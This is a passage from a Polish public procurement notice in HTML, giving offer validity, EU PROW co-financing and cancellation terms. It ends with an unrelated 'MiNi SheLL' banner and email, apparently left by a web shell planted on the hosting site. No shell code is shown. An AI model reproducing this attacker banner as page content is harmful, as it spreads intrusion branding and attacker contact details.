Biuro Obsługi Klienta, parter, obok głównego wejścia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający ubiega się o dofinansowanie zadania z PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com